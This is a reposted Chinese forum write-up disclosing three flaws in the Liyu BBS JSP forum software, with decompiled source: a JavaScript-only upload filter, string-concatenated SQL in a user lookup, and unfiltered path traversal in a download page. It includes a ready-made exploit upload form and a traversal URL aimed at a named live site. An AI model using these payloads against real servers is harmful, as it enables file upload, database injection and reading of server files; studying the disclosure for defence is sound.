[转载]鲤鱼bbs漏洞
文章作者:superhei[注class文件代码都为‘Java源代码反编译专家’反编译的]
1.reg_upload.jsp上传任意文件漏洞
...
<HEAD>
<SCRIPT language="JavaScript" type="text/javascript">
function upload()
{
var filename = document.mainform.file.value;
filename = filename.toLowerCase();
var accept = false;
accept |= (filename.indexOf('.jpg')>-1);
accept |= (filename.indexOf('.jpeg')>-1);
accept |= (filename.indexOf('.bmp')>-1);
accept |= (filename.indexOf('.gif')>-1);
if(!accept)
{
alert("请选择图形文件!");
document.mainform.file.focus();
return false;
}
return true;
}
</SCRIPT>
<%
String StrLoad = request.getParameter("upload");
String TempName = "", errMsg = "";
try{
if((StrLoad!=null)&&(StrLoad.equals("up"))){
mySmartUpload.initialize(pageContext);
mySmartUpload.setTotalMaxFileSize(30000);
mySmartUpload.upload();
.......
只利用js判断后缀,可以本地构造提交页突破:exp.htm
<FORM action="[url]http://www.liyunet.com/bbs/reg_upload.jsp?upload=up[/url]" enctype="multipart/form-data" method="post" name="mainform" onsubmit="return upload();">
<input name="file" size=20 type="file" value="">
<input type="submit" value="确定">
</FORM>
上传成功后,看返回原代码就可以看到上传后的文件名。
2.多个String对象变量注射漏洞
和php相比,jsp由于没有安全开关设置,可以使用' 导致注射bug范围更大,如update等都很容易注射
对于数字型的,都用了getInt(),所以都没什么机会,但是字符型的,就没有过滤了,如:
dispuser.jsp里:
<%
try{
String searchUserName=ParamUtil.getString(request,"name");
User user=UserManager.findUser(searchUserName);
%>
UserManager.findUser的代码:[\WEB-INF\classes\com\bcxy\bbs\forum\UserManager.class]
......
public static User findUser(String userName)
throws UserNotFoundException, Exception
{
try
{
SqlQuery rs = new SqlQuery("select * from User where UserName like '" + userName + "'");
if(rs.next())
.......
其他的就不举例了。
3.file_download.jsp下载任意文件漏洞
<%
String rDownFile = com.bcxy.bbs.util.ParamUtil.getString(request, "filename", "");
String downFile = "/WEB-INF/upload/" + rDownFile;
//
try{
com.bcxy.upload.SmartUpload mySmartUpload = new com.bcxy.upload.SmartUpload();
mySmartUpload.initialize(pageContext);
mySmartUpload.setContentDisposition(null);
mySmartUpload.downloadFile(downFile);
}catch(Exception e){
e.printStackTrace();
out.println("下载出错,请与管理员联系!");
}
%>
filename变量没有过滤
mySmartUpload.downloadFile()在WEB-INF\classes\com\bcxy\upload、SmartUpload.class里 代码就不贴了,也没有过滤.. / \等
利用如:[url]http://www.liyunet.com/bbs/file_dow...le_download.jsp[/url]
页:
[1]